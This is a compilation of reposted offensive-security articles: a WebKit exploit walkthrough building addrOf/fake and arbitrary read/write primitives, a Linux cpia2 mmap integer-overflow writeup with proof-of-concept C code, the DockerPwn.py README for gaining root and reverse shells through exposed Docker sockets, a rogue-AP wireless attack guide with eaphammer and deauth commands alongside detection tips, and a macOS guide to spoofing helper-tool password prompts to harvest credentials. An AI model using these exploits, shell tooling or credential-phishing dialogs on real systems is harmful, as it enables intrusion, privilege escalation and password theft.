It is important to note here the types of spray_arr and spray_arr2, as they are necessary for constructing the exploit primitives. They are ArrayWithDouble and ArrayWithContiguous respectively. An array with type ArrayWithDouble contains non-boxed float values, which means an element is written and read as a native float number. ArrayWithContiguous is different, as it treats its elements as boxed JSValues, so it reads and writes JS objects. The basic idea is finding a way to write an object to the ArrayWithContiguous array (spray_arr2) and then read its memory address from the ArrayWithDouble array (spray_arr), and vice versa, where we write a memory address to spray_arr and read it back as an object using spray_arr2. In order to do that, we need to get hold of the overlapped space using the two arrays spray_arr and spray_arr2. Let us take a look at the following:

This snippet loops over spray, specifically the ArrayWithDouble instances (spray_arr), and breaks when it finds the first overlapped space with bigarr, returning its index, oobarr_idx, in spray and a new object, oobarr, pointing to that space. The main condition to satisfy for breaking is spray.length > 0x40, because when spray points to the bigarr data, which consists of 0x4142414141410000, its length will be located 8 bytes back, which is also 0x4142414141410000. This makes the length 0x41410000, which is > 0x40.

What is oobarr? It is an array of type ArrayWithDouble pointing to the beginning of the overlapped space between spray and bigarr. oobarr[0] should return 0x4142414141410000. The oobarr array is the first one we can use in order to read and write object addresses. contarr is an array of type ArrayWithContiguous pointing to a space that is shared with oobarr.
Below shows the snippet executed. The following shows both the addrOf and fake primitives. The addrOf primitive is used to return the address of any JS object, by writing the object to the ArrayWithContiguous array and reading it from the ArrayWithDouble array as a float. The fake primitive is the opposite: it is used to create a JS object from a memory address, by writing the address to the ArrayWithDouble array and reading it from the ArrayWithContiguous array. It is clear in the debugger output that both primitives work as expected. A sketch of the pair is shown below.
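The article shows these primitives as a snippet image; reconstructed in sketch form (the aliasing index k into oobarr, and the reuse of the i2f/f2i helpers from above, are assumptions about the actual code):

// contarr (ArrayWithContiguous) and oobarr (ArrayWithDouble) overlap in memory,
// so contarr[0] aliases some element oobarr[k] found while scanning the spray
function addrOf(obj) {
    contarr[0] = obj;        // write a boxed JSValue
    return f2i(oobarr[k]);   // reread the same bits as a raw double -> [hi, lo]
}

function fake(hi, lo) {
    oobarr[k] = i2f(hi, lo); // write raw bits as a double
    return contarr[0];       // reread the same bits as a boxed object pointer
}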
The next step is achieving arbitrary read/write by creating a fake object and controlling its butterfly. We know by now that objects store data in their butterfly if it is not inline. This looks like the diagram from Filip Pizlo's talk. Check out the following: we create an empty array (length 0) with a single property, p0, containing a string. Its memory layout is shown below. When we go to butterfly - 0x10, we see the quadwords for the length and the first property. Its vector length is 0, while the property points to 0x1034740a0. It should be clear by now that in order to access a property in an object, we get the butterfly and then subtract 0x10. What happens if we control the butterfly? Well, arbitrary read and write happens.

For any JS object to be valid in memory, its JSCell must be valid as well, and that includes its structure ID. Structure IDs cannot be generated manually, but they are predictable, at least on the build we are working on. Since we are planning on creating a fake object, we need to make sure it has a valid JSCell. The following snippet sprays 0x400 a objects so we can predict a value between 1 and 0x400 for its structure ID. We need to create a victim object that we control. Take a look at the following: mngr is the middle object in struct_spray, and we create victim, making sure it resides in the address range after mngr's address. We are going to use the outer object to create the fake object hax. The first property, a, is basically going to be the JSCell of the fake object. It will end up as 0x0108200700000200, which means 0x200 is the structure ID we predicted. The - (1<<16) part is just to account for the boxing effect (which adds 2^48) when that value is stored in the object. The b property will be the butterfly of the fake object. To create hax, we get the outer address and then add 0x10 to it. We then feed the result to the fake primitive that was created earlier. The object's layout is shown in the lldb output below.

When accessing an index of hax, we are accessing the memory space starting from mngr's address, shown below. Since objects are located in the same space and victim was created last, it is located after mngr. By subtracting mngr_addr from victim_addr, we can reach victim's JSCell and butterfly (+8) when indexing the result in hax. Let's achieve arbitrary read/write. As mentioned previously, when victim.p0 is accessed, its butterfly is fetched and then we go backwards 0x10 in order to grab the first property. set_victim_addr sets victim's butterfly to the value we provide plus 0x10. It is easier to look at it in the debugger. Looking at the dump above, we notice that originally victim's butterfly was 0x18014e8028. Later, it became 0x18003e4030, which is actually test's address plus 0x18. When read64 is called, it is passed test's address plus 8, since we are trying to read its butterfly. Within set_victim_addr, another 0x10 is added to the address. When victim.p0 is read, its butterfly 0x2042fc058 is fetched, then 0x10 is subtracted. This results in 0x2042fc048, which actually points to test's butterfly. victim.p0 then fetches the value pointed to by the property address (0x18003e4030 in this case). Applying addrOf() to that gets us the actual 0x18003e4030 value. Now we have achieved arbitrary read. Writing is similar, as shown in write64, where we write a value to victim.p0 using fake(). Neat, right?

Conclusion

I hope you have enjoyed this in-depth walkthrough. Bugs that come into the program through Pwn2Own tend to be some of the best we see, and this one is no exception. I also hope you learned a bit about lldb and about walking through WebKit looking for bugs. If you find any, you know where to send them. You can find me on Twitter at @ziadrb, and follow the team for the latest in exploit techniques and security patches.

Sursa: https://www.thezdi.com/blog/2019/11/25/diving-deep-into-a-pwn2own-winning-webkit-bug
  6. Kernel Research / mmap handler exploitation

November 22, 2019

Description

Recently I started to review the Linux kernel; I've put much time and effort into trying to identify vulnerabilities. I looked at the cpia2 driver, which is a V4L driver aimed at supporting cpia2 webcams (official documentation here). I found a vulnerability in the mmap handler implementation of the driver. Kernel drivers may re-implement their own mmap handlers, usually to speed up the process of exchanging data between user space and kernel space. The cpia2 driver re-implements an mmap handler for sharing the frame buffer with the user application which controls the camera.

Let's get into it

Here is the userspace mmap function prototype (taken from man):

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

Here the user supplies parameters for the mapping; we will be interested in the length and offset parameters:
- length - determines the length of the mapping
- offset - determines the offset from the beginning of the device that the mapping will start from

The driver's specific mmap handler will remap kernel memory to userspace using a function like remap_pfn_range.

CVE-2019-18675

Let's have a look at the cpia2 mmap handler implementation. We can see the file_operations struct:

/***
 * The v4l video device structure initialized for this device
 ***/
static const struct v4l2_file_operations cpia2_fops = {
	.owner = THIS_MODULE,
	.open = cpia2_open,
	.release = cpia2_close,
	.read = cpia2_v4l_read,
	.poll = cpia2_v4l_poll,
	.unlocked_ioctl = video_ioctl2,
	.mmap = cpia2_mmap,
};

Let's look at the function cpia2_mmap:

static int cpia2_mmap(struct file *file, struct vm_area_struct *area)
{
	struct camera_data *cam = video_drvdata(file);
	int retval;

	if (mutex_lock_interruptible(&cam->v4l2_lock))
		return -ERESTARTSYS;
	retval = cpia2_remap_buffer(cam, area);

	if (!retval)
		cam->stream_fh = file->private_data;
	mutex_unlock(&cam->v4l2_lock);
	return retval;
}

It just calls the function cpia2_remap_buffer() with a pointer to the camera_data struct:

/******************************************************************************
 *
 *  cpia2_remap_buffer
 *
 *****************************************************************************/
int cpia2_remap_buffer(struct camera_data *cam, struct vm_area_struct *vma)
{
	const char *adr = (const char *)vma->vm_start;
	unsigned long size = vma->vm_end - vma->vm_start;
	unsigned long start_offset = vma->vm_pgoff << PAGE_SHIFT;
	unsigned long start = (unsigned long)adr;
	unsigned long page, pos;

	DBG("mmap offset:%ld size:%ld\n", start_offset, size);

	if (!video_is_registered(&cam->vdev))
		return -ENODEV;

	if (size > cam->frame_size * cam->num_frames ||
	    (start_offset % cam->frame_size) != 0 ||
	    (start_offset + size > cam->frame_size * cam->num_frames))
		return -EINVAL;

	pos = ((unsigned long)(cam->frame_buffer)) + start_offset;
	while (size > 0) {
		page = kvirt_to_pa(pos);
		if (remap_pfn_range(vma, start, page >> PAGE_SHIFT, PAGE_SIZE, PAGE_SHARED))
			return -EAGAIN;
		start += PAGE_SIZE;
		pos += PAGE_SIZE;
		if (size > PAGE_SIZE)
			size -= PAGE_SIZE;
		else
			size = 0;
	}

	cam->mmapped = true;
	return 0;
}

We can see that start_offset + size is being calculated, and the sum is being compared to the total size of the frames:
if (...
    || (start_offset + size > cam->frame_size * cam->num_frames))
	return -EINVAL;

However, the calculation start_offset + size can wrap around to a low value (a.k.a. an integer overflow), allowing an attacker to bypass the check while still using a big start_offset value, which leads to a mapping of unintended kernel memory. The only requirement is that the start_offset value is a multiple of frame_size (which can be controlled via the cpia2 driver options; by default it is 68k). And this can be quite bad, because a huge offset will allow us to perform a mapping at an arbitrary offset (outside of the frame buffer's bounds), and this can possibly result in a privilege escalation.

Demo time!

I used a QEMU kernel virtual machine (here). Now we have to:
1. Open /dev/video0
2. mmap size 0x11000 at offset 0xffffffffffff0000. The overflow will occur and we will pass the check (the 64-bit sum 0xffffffffffff0000 + 0x11000 wraps around to 0x1000, which passes the bounds comparison).

Here is a minimalistic example of exploit code:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>

#define VIDEO_DEVICE "/dev/video0"

int main(){
	pid_t pid;
	char command[40];

	int fd = open(VIDEO_DEVICE, O_RDWR);
	if (fd < 0) {
		printf("[-]Error opening device file\n");
	}

	printf("[+]Demonstration\n");
	pid = getpid();
	printf("[~]PID IS %d ", pid);
	getchar();

	int size = 0x11000;
	unsigned long mapStarter = 0x43434000;
	unsigned long *mapped = mmap((void *)mapStarter, size, PROT_WRITE | PROT_READ,
	                             MAP_SHARED, fd, 0xffffffffffff0000);
	if (mapped == MAP_FAILED)
		printf("[-]Error mapping the specified region\n");
	else
		puts("[+]mmap went successfully\n");

	/* view the /proc/<pid>/maps file */
	sprintf(command, "cat /proc/%d/maps", pid);
	system(command);
	return 0;
}

Compile and run: and B00M! We have got read and write primitives into kernel space! By modifying struct cred or kernel function pointers/variables we can possibly gain root, or destroy kernel data!

Tips and thoughts

Because I didn't have the required hardware (for example, an Intel Qx5 microscope), I made some changes in the driver's code for this PoC. I changed the hardware and USB parts in a way that allowed me to test the mmap functionality as it is in the original driver. Because the vulnerability is not related to the hardware interaction parts, this wasn't a problem. This way I could research more and even debug the interesting parts without depending on hardware.

This vulnerability is more than 8 years old! This is my first public vulnerability!

Additional info

CVE-2019-18675 on NVD
CVE-2019-18675 on Mitre

Sursa: https://deshal3v.github.io/blog/kernel-research/mmap_exploitation
  7. DockerPwn.py

Automation for abusing an exposed Docker TCP socket. This will automatically create a container on the Docker host with the host's root filesystem mounted, allowing arbitrary read and write of the host filesystem (which is bad). Once created, the script will employ the method of your choosing for obtaining a root shell. All methods are now working properly and will return a reverse shell. Chroot is the least disruptive, but Useradd is the default.

Installation:

It is recommended that you utilize the following for usage, as opposed to static releases - code in this repository may be updated frequently with minor improvements before releases are created.

git clone https://github.com/AbsoZed/DockerPwn.py && cd DockerPwn.py

Methods:

All shell I/O is logged to './DockerPwn.log' for all methods.

UserPwn: Creates a 'DockerPwn' user and adds them to /etc/sudoers with NOPASSWD. The handler automatically escalates to root using this privilege, and spawns a PTY.

ShadowPwn: Changes root and any valid user passwords to 'DockerPwn' in /etc/shadow, authenticates with Paramiko, and sends a reverse shell. The handler automatically escalates to root utilizing 'su', and spawns a PTY.

ChrootPwn: Creates a shell.sh file which is a reverse shell, hosted on port 80. Downloads it to /tmp and utilizes chroot in the docker container to execute the shell in the context of the host, providing a container shell with interactivity to the host filesystem.

Roadmap:

SSL support for :2376

Usage:

DockerPwn.py [-h] [--target TARGET] [--port PORT] [--image IMAGE] [--method METHOD] [--c2 C2]

optional arguments:
  -h, --help       show this help message and exit
  --target TARGET  IP of Docker Host
  --port PORT      Docker API TCP Port
  --image IMAGE    Docker image to use. Default is Alpine Linux.
  --method METHOD  Method to use. Valid methods are shadowpwn, chrootpwn, userpwn. Default is userpwn.
  --c2 C2          Local IP and port in [IP]:[PORT] format to receive the shell.
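For example, a run using the default userpwn method against a host exposing the Docker API on the usual plaintext port might look like this (invoked with python3 and placeholder IP addresses, assuming a Python 3 environment):

python3 DockerPwn.py --target 10.10.10.15 --port 2375 --method userpwn --c2 10.10.10.99:4444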
Sursa: https://github.com/AbsoZed/DockerPwn.py
  8. Modern Wireless Tradecraft Pt IV — Tradecraft and Defensive Strategy

Gabriel Ryan, Nov 23 · 9 min read

We've gone over a lot of information in the last three sections of this writeup. In case you missed them, you can find them here:

https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38

Now it's time to make sense of it all and talk about how each of the techniques we described fits into our toolkit from an operational perspective. Before we begin, we need to establish some important points from which we'll build a frame of reference. The first of these is that wireless attacks are inherently risky, since they must be executed within line-of-sight distance of the target. Wireless attacks are a bit like motorcycles: they're fun, they can be a fast way to get from point A to point B, but they do come with risks that must be managed in order to be used effectively. I'm pretty opinionated about this: I believe that, because of the inherent risk, wireless tradecraft needs to be:

Pragmatic: Focus should be placed on vetted techniques that are known to work reliably. Attacks should be prepared in advance instead of developed or prepared onsite.

Disciplined: Attacks should be executed with deliberation against specific targets to achieve desired outcomes. Attacks should be supervised as they progress. "Spray and pray" tactics such as automatic deauthing should be avoided.

Flexible: Techniques should be adjusted in realtime based on observed results.

Impact Focused: Focus should be placed on attacks that reliably generate maximum impact in minimum time.

Impact Focused Wireless Attacks

The last point is particularly important. I do not believe that SSLStripping or credential sniffing are practices that belong in modern wireless playbooks, for this reason: the widespread adoption of HSTS and certificate pinning means that using these techniques is largely a waste of time, and time is a valuable commodity that can lead to detection if not properly managed. With that out of the way, here are some situations in which I think the use of wireless tradecraft can actually make sense:

Breaching Wireless Networks: This is the obvious one. The end goal may be to gain access to an internal corporate network, or it may be something simpler like direct access to surveillance equipment, point-of-sale systems, or other networked hardware.

Payload Delivery: APTs will phish under most circumstances, and you should too. However, if phishing isn't your thing or the situation calls for something different, rogue AP attacks can be a startlingly effective platform through which to deliver payloads to WiFi-enabled devices. Once you've forced a device to connect to you, you gain the ability to act as either a captive portal or an internet gateway. As a captive portal, you can redirect users to pages that prompt them to install implants (aka "updates"), and restrict their Internet access until they comply. When acting as a network gateway, you can inject malicious code into static content (i.e. modify unencrypted JavaScript files in transit, etc). In both cases, you can restrict communication to endpoint protection servers, buying you time to complete the attack.
AD Credential Theft: Many organizations tie their wireless infrastructure into Active Directory (AD). If these organizations use weak WPA/2-EAP configurations, the same attacks that you'd use to breach the wireless perimeter can also be effective tools for harvesting AD credentials. Until recently, it was even possible to use HTTP-to-SMB redirection to force Windows devices to surrender AD credentials, although this flaw seems to have been patched in Chrome and Edge within the past year (see: https://github.com/s0lst1c3/eaphammer/wiki/III.-Stealing-AD-Credentials-Using-Hostile-Portal-Attacks).

For the sake of simplicity, let's group these scenarios into two overarching use-cases:

1. Breaching Wireless Networks
2. Targeting Client Devices

In the sections that follow, we'll examine the suitability of each of the techniques we've learned for these two specific purposes.

Choosing a Rogue AP Technique

Evil Twin Attacks

Optimal Use-Case: Breaching Wireless Perimeter

Evil Twin attacks are the primary means of attacking WPA/2-EAP networks, and can also be an effective means of attacking WPA/2-PSK networks. Breaching WPA/2-EAP networks involves using rogue AP attacks to exploit weak EAP configurations. This is a topic for which educational material is already widely available, so I'm not going to cover it in depth in this post. With that said, here's a quick primer on the subject if you're interested: http://solstice.sh/workshops/advanced-wireless-attacks/ii-attacking-and-gaining-entry-to-wpa2-eap-wireless-networks/

To attack a WPA/2-PSK network using an evil twin, you create a rogue access point with the same ESSID as the target and configure it to use WPA/2-PSK. You then capture the first two messages of the 4-way WPA handshake from any client that attempts to connect, and crack them to obtain the plaintext password. To perform this attack using EAPHammer, use the --creds flag in conjunction with the --auth wpa-psk flag:

./eaphammer -i wlan0 -e exampleCorp -c 1 --creds --auth wpa-psk

I should point out that this is not a new attack: it has existed in hostapd-mana since January 2019 and in airbase-ng since dinosaurs roamed the earth.

Secondary Use-Case: Targeting Client Devices

Evil Twin attacks can be a good choice for targeting specific client devices if you have knowledge of at least one network on the device's PNL. However, this approach can be dangerous. Evil twins broadcast beacon frames by default, which prevents us from using MAC-based MFACLs to restrict the attack's impact to specific devices. If the ESSID of the evil twin is target-specific (i.e. you're attacking EvilCorp and the ESSID of your rogue AP is something specific to EvilCorp's infrastructure), then you're probably OK. But if your rogue AP has a fairly common ESSID such as "attwifi", you stand a high chance of causing collateral damage. Using EAPHammer's --cloaking full flag can mitigate a lot of this risk, because it will cause your AP to rely exclusively on broadcast probe responses to force targets to connect.

./eaphammer -i wlan0 -e exampleCorp -c 1 --hostile-portal --cloaking full --auth owe

However, cloaked evil twin attacks can be stopped using many of the same countermeasures that are used to stop classic karma attacks, so this may not be the best approach.

Opsec Considerations

Savvy network defenders often whitelist their access points by BSSID.
As an attacker, you can circumvent these restrictions by spoofing the BSSID of a whitelisted AP (make sure to choose one that is a considerable distance away to avoid BSS conflicts). You should try to match the capabilities of the target access point though, since failure to do so will make your rogue AP stick out like a sore thumb.

MANA (and loud MANA) Attacks

Optimal Use-Case: Targeting Client Devices

MANA attacks (and all karma-style attacks, for that matter) are mainly designed for situations in which you need to target a client device but do not know the device's PNL. They are also ideal for targeting specific devices, since they can be controlled using MAC-based MFACLs (unlike Evil Twins, which rely primarily on beacon frames).

Secondary Use-Case: Breaching Wireless Perimeter

If the goal of the attack is to steal credentials for a WPA network, an evil twin is generally a better choice. However, it can make sense to use MANA attacks to breach WPA/2-PSK and WPA/2-EAP networks when Wireless Intrusion Prevention Systems (WIPS) are present. MANA attacks can be used to execute a quieter version of the traditional evil twin attack. To do this, begin by creating an ESSID whitelist file containing the ESSID of the target access point:

echo exampleCorp > target-ess.txt

Next, create a MAC address whitelist file containing the MAC addresses of our targets:

echo 00:CB:19:D1:DD:B2 > mac-whitelist.txt
echo A3:A5:9A:A9:B3:A4 >> mac-whitelist.txt
echo FE:47:F2:7B:69:5C >> mac-whitelist.txt
echo C0:AF:A8:23:8D:7E >> mac-whitelist.txt
echo 33:58:A1:6E:A4:5F >> mac-whitelist.txt
echo C1:62:2A:5D:F8:80 >> mac-whitelist.txt

Next, create a rogue AP with the following configuration:

cloaking enabled
ESSID of target network
802.11w enabled (but not required) to prevent deauths from WIPS
MAC-based MFACL to restrict probe responses to specific devices
ESSID-based MFACL to restrict probe responses to target network
auth set to either WPA-PSK or WPA-EAP (depending on target network configuration)

./eaphammer -i wlan0 \
    -e exampleCorp \
    --pmf enable \
    --cloaking full \
    --mana \
    --auth wpa-eap \
    --creds \
    --mac-whitelist mac-whitelist.txt \
    --ssid-whitelist target-ess.txt

Optional: deauthenticate client devices to coerce them to roam to the new AP:

for i in `cat mac-whitelist.txt`; do aireplay-ng -0 5 -a de:ad:be:ef:13:37 -c $i; done

The rogue AP will stay "dormant" (not advertise its presence) until it receives probe requests from the target device(s), at which point it will respond in an attempt to trick the targets into associating.

Opsec Considerations

All karma-style attacks (including MANA) create an easily detectable one-to-many relationship between a single BSSID and multiple ESSIDs. See the section on detection strategies for more information.

Known Beacon Attacks

Optimal Use-Case: Targeting Client Devices

Known Beacon attacks make sense in situations where you do not know the target devices' PNL and where MANA attacks fail.

Opsec Considerations

Known beacon attacks are extremely loud due to the one-to-many relationship they create between a single BSSID and numerous ESSIDs. They also have a high potential for collateral damage. MAC-based MFACLs can limit this collateral damage to some extent: devices will still attempt to connect to your rogue AP, even though they won't be able to complete the association process. Depending on the rogue AP's transmission rate and the number of spoofed ESSIDs in use, known beacon attacks can cause network congestion. An example invocation is sketched below.
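The post doesn't show a known beacon invocation at this point in the series; as a rough sketch based on EAPHammer's documented options (the flag names are from memory, so verify them against your version's --help output, and the wordlist filename is just a placeholder):

./eaphammer -i wlan0 --cloaking full \
    --known-beacons \
    --known-ssids-file known-ssids.txt \
    --mac-whitelist mac-whitelist.txt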
Detection Strategies

Rogue AP detection is a pretty expansive topic, so this won't be an exhaustive writeup. I do plan on writing at least one dedicated post on this subject in the future though, most likely geared towards Kibana and Wifibeat. With that out of the way, here's a list of fundamental indicators that any Wireless Intrusion Prevention System (WIPS) should monitor for:

1. New ESSIDs

It's unusual to see new ESSs appear out of nowhere. Although the presence of a new ESS is not an indicator by itself, it does warrant additional investigation.

2. Legacy versions of 802.11

Most modern networking hardware uses 802.11ac, although it's not uncommon to see 802.11n deployed in production as well. On the other hand, the vast majority of wireless pentesting hardware is limited to 802.11n and earlier. Unless adversaries are particularly aware of what they're doing, they are likely to use an external wireless interface that is limited to 802.11g or 802.11a. If you suddenly see a new ESS appear and operate in 802.11g/a mode, that's a pretty good indication that you should take a closer look.

3. Uncommon OUIs

The first three octets of any device's MAC address contain an Organizationally Unique Identifier (OUI) that is used to uniquely identify the device's manufacturer. Most rogue AP attacks are executed using external hardware made by manufacturers such as Alfa, TP-Link, and Panda Wireless. As such, it's typically a good idea to monitor for devices with OUIs from these types of manufacturers.

4. ESSID Whitelist Violations

Keep an inventory of BSSIDs in your network, and use it as a whitelist. If you see an access point that is using your ESSID but is not in your whitelist, that is a strong indication that your network is being attacked.

5. One-to-many relationships

A single BSSID should never map to more than one ESSID. The presence of beacon packets or probe response packets for multiple ESSIDs originating from a single BSSID is a strong indicator of malicious activity.

6. Known default settings for rogue AP attack tools

Most publicly available tools for performing rogue AP attacks (including the WiFi Pineapple and EAPHammer) have easily identifiable default settings. For example, both EAPHammer and the WiFi Pineapple have a default BSSID of either 00:11:22:33:44:00 or 00:11:22:33:44:55. Additionally, EAPHammer has a default ESSID of eaphammer, which is still present during karma / MANA attacks unless manually specified by the user. These defaults are basically built-in "skid" filters that were, at least in the case of EAPHammer, deliberately included to make irresponsible use easier to detect.

Conclusion

This concludes our primer series Modern Wireless Tradecraft.

Written by Gabriel Ryan. Researcher and Infosec Journeyman. Red / Blue multiclass battlemage @SpecterOps. I enjoy low-level code and things without wires. Views are my own. #hacking

Sursa: https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
  9. macOS Red Team: Spoofing Privileged Helpers (and Others) to Gain Root

By Phil Stokes - November 25, 2019

As we saw in previous posts, macOS privilege escalation typically occurs by manipulating the user rather than exploiting zero days or unpatched vulnerabilities. Looking at it from the perspective of a red team engagement, one native tool that can be useful in this regard is AppleScript, which has the ability to quickly and easily produce fake authorization requests that can appear quite convincing to the user. Although this in itself is not a new technique, in this post I will explore some novel ways we can (ab)use the abilities of AppleScript to spoof privileged processes the user already trusts on the local system.

What is a Privileged Helper Tool?

Most applications on a Mac don't require elevated privileges to do their work, and indeed, if the application is sourced from Apple's App Store, they are – at least technically – not allowed to do so. Despite that, there are times when apps have quite legitimate reasons for needing privileges greater than those possessed by the currently logged in user. Here's a short list, from Apple's own documentation:

manipulating file permissions, ownership
creating, reading, updating, or deleting files
opening privileged ports for TCP and UDP connections
opening raw sockets
managing processes
reading the contents of virtual memory
changing system settings
loading kernel extensions

Often, programs that need to perform any of these functions only need to do so occasionally, and in that context it makes sense to simply ask the user for authorization at the time. While this may improve security, it is also not the most convenient if the program in question is going to need to perform one or more of these actions more than once in any particular session. Users are not fond of repeated dialog alerts or of repeatedly having to type in a password just to get things done.

Privilege separation is a technique that developers can use to solve this problem. By creating a separate "helper program" with limited functionality to carry out these tasks, the user need only be asked at install time for permission to install the helper tool. You've likely seen permission requests that look something like this:

The helper tool always runs with elevated privileges, but it is coded with limited functionality. At least in theory, the tool can only perform specific tasks and only at the behest of the parent program. These privileged helper tools live in a folder in the local domain Library folder:

/Library/PrivilegedHelperTools

Since they are only installed by 3rd party programs sourced from outside of the App Store, you may or may not have some installed on a given system. However, some very popular and widespread macOS software either does or has made use of such tools. Since orphaned Privileged Helper Tools are not removed by the OS itself, there's a reasonable chance that you'll find some of these in use if you're engaging with an organisation with Mac power users. Here are a few from my own system that use Privileged Helper Tools:

BBEdit
Carbon Copy Cloner
Pacifist

Abuses of the trust mechanism between parent process and privileged helper tool are possible (CVE-2019-13013), but that's not the route we're going to take today. Rather, we're going to exploit the fact that there's a high chance the user will be familiar with the parent apps of these privileged processes and will inherently trust requests for authorization that appear to be coming from them.
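As a quick aside for operators: since all such helpers live in a single directory, an initial recon step can be as simple as listing it (a one-line sketch; nothing here is specific to the post's own code):

ls -l /Library/PrivilegedHelperTools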
Why Use AppleScript for Spoofing?

Effective social engineering is all about context. Of course, we could just throw a fake user alert at any time, but to make it more effective, we want to:

Make it look as authentic as possible – that means using an alert with convincing text, an appropriate title and preferably a relevant icon
Trigger it for a convincing reason – apps that have no business or history of asking for privileges are going to raise more suspicion than those that do. Hence, Privileged Helper tools are useful candidates, particularly if we provide enough authentic details to pass user scrutiny.
Trigger it at an appropriate time, such as when the user is currently using the app that we're attempting to spoof.

All of these tasks are easy to accomplish and combine using AppleScript. Here's an example of the sort of thing we could create using a bit of AppleScripting.

The actual dialog box is fairly crude. We haven't got two fields of input for both user name and password, for one thing (although as we'll see in Part 2 that is possible), but even so this dialog box has a lot going for it. It contains a title, an icon and the name of a process that, if the user were to look it up online, would lead them back to a Privileged Helper tool that they can verify exists in their own /Library/PrivilegedHelperTools folder. The user would have to dig quite a bit deeper in order to actually discover our fraud.

Of course, a suspicious user might just press "Cancel" instead of doing any digging at all. Fortunately, using AppleScript means we can simultaneously make our request look more convincing and discourage our target from doing that by wiring up the "Cancel" button to code that will either kill the parent app or simply cause an infinite repeat. An infinite repeat might raise too many suspicions, however; killing the app and throwing a suitable alert "explaining" why this just happened could look far more legitimate. When the user relaunches the parent app and we trigger our authorization request again, the user is now far more likely to throw in the password and get on with their work.

For good measure, we can also reject the user's first attempt to type the password and make them type it twice. Since what is typed isn't shown back to the user, making typos on password entry is a common experience. Forcing double entry (and capturing the input both times) should ensure that if the first attempt contained a typo or was not correct, the second one should be (we could also attempt to verify the user's password directly before accepting it, but I shall leave such details aside here as we've already got quite a lot of work to get through!).

Creating the Spoofing Script

If you are unfamiliar with AppleScript or haven't looked at how it has progressed in recent years since Yosemite 10.10, you might be surprised to learn that you can embed Objective-C code in scripts and call Cocoa and Foundation APIs directly. That means we have all the power of native APIs like NSFileManager, NSWorkspace, NSString, NSArray and many others. In the examples below, I am using a commercial AppleScript editor (also available in a free version) that is a far more effective AppleScript development environment than the unhelpful built-in Script Editor app.

As with any other scripting or programming language, we need to "import" the frameworks that we want to use, which we do in AppleScript with the use keyword. Let's put the following at the top of our script:
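(The original post shows this header only as an image; the following is a minimal reconstruction. The exact version string and the inclusion of AppKit are assumptions based on the APIs used later in the post.)

use AppleScript version "2.4" -- Yosemite (10.10) or later, enabling AppleScript-ObjC
use scripting additions
use framework "Foundation" -- NSString, NSFileManager, NSArray, ...
use framework "AppKit" -- NSWorkspace, assumed for the app-path lookups below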
These act as shortcuts to the AppleScript-Objective-C bridge and make the named APIs accessible in a convenient manner, as we'll see below.

Next, let's write a couple of "handlers" (functions) to enumerate the PrivilegedHelperTools directory. In the image below, the left side shows the handler we will write; on the right side is an example of what it returns on my machine. As we can see, this handler is just a wrapper for another handler, enumerateFolderContents:, which was borrowed from a community forum. Let's take a look at the code for that, which is a bit more complex:

# adapted from a script by Christopher Stone
on enumerateFolderContents:aFolderPath
    set folderItemList to "" as text
    set nsPath to current application's NSString's stringWithString:aFolderPath
    --- Expand Tilde & Symlinks (if any exist) ---
    set nsPath to nsPath's stringByResolvingSymlinksInPath()
    --- Get the NSURL ---
    set folderNSURL to current application's |NSURL|'s fileURLWithPath:nsPath
    set theURLs to (NSFileManager's defaultManager()'s enumeratorAtURL:folderNSURL includingPropertiesForKeys:{} options:((its NSDirectoryEnumerationSkipsPackageDescendants) + (get its NSDirectoryEnumerationSkipsHiddenFiles)) errorHandler:(missing value))'s allObjects()
    set AppleScript's text item delimiters to linefeed
    try
        set folderItemList to ((theURLs's valueForKey:"path") as list) as text
    end try
    return folderItemList
end enumerateFolderContents:

Now that we have our list of Privileged Helper Tools, we will want to grab the file names separately from the path, as we will use these names in our message text to boost our credibility. In addition, we want to find the parent app from the Helper tool's binary, both so that we can show this to the user and because we will also need it to find the app's icon. This is how we do the first task, again with the code on the left and example output shown on the right:

Now that we have our targets, all that remains is to find the parent apps. For that, we'll borrow and adapt from Erik Berglund's script here. In this example, we can see the parent application's bundle identifier is "com.barebones.bbedit".

There are a number of ways we can extract the identifier substring from the string, such as using command line utils like awk (as Erik does), or using cut to slice fields, but I'll stick to Cocoa APIs both for the sake of speed and to avoid unnecessarily spawning more processes. Be aware that, whatever technique you use, the identifier does not always occur in the same position and may not begin with "com". In all cases that I'm aware of, though, it does follow immediately after the keyword "identifier", so I'm going to use that as my primary delimiter. Do ensure your code accounts for edge cases (I'll omit error checking here for want of space).

In the code above, I use Cocoa APIs to first split the string around either side of the delimiter. That should leave me with the actual bundle identifier at the beginning of the second substring. Note the as text coercion at the end. One hoop we have to jump through when mixing AppleScript and Objective-C is converting back and forth between NSStrings and AppleScript text. With the parent application's bundle identifier to hand, we can find the parent application's path thanks to NSWorkspace. We'll also add a loop to do the same for all items in the PrivilegedHelperTools folder (a rough sketch follows below).
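(Since the post shows this step only as screenshots, here is a rough AppleScript-ObjC sketch of the idea; the variable names and the source of infoStr are my own assumptions, not the author's code.)

-- infoStr is assumed to hold the designated-requirement string for a helper
-- binary, containing something like: ...identifier "com.barebones.bbedit"...
set nsInfo to current application's NSString's stringWithString:infoStr
set parts to nsInfo's componentsSeparatedByString:"identifier "
-- the bundle identifier sits at the start of the second substring
set idPart to (parts's objectAtIndex:1)
set bundleID to ((idPart's componentsSeparatedByString:"\"")'s objectAtIndex:1)
-- resolve the parent app's path via NSWorkspace; this call needs the NSString,
-- so the 'as text' coercion is delayed until after it
set appURL to (current application's NSWorkspace's sharedWorkspace()'s URLForApplicationWithBundleIdentifier:bundleID)
set appPath to (appURL's |path|()) as text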
Note how I've moved the text conversion away from the bundleID variable because I still need the NSString for the NSWorkspace call that now follows it. The text conversion is delayed until I need the string again in an AppleScript call, which occurs at the end of the repeat loop. At this point, we now have the names of each Privileged Helper tool and its path, as well as the bundle identifier and path of each helper tool's parent app. With this information, we have nearly everything we need for our authorization request. The last remaining step is to grab the application icon from each parent app.

Grabbing the Parent Application's Icon Image

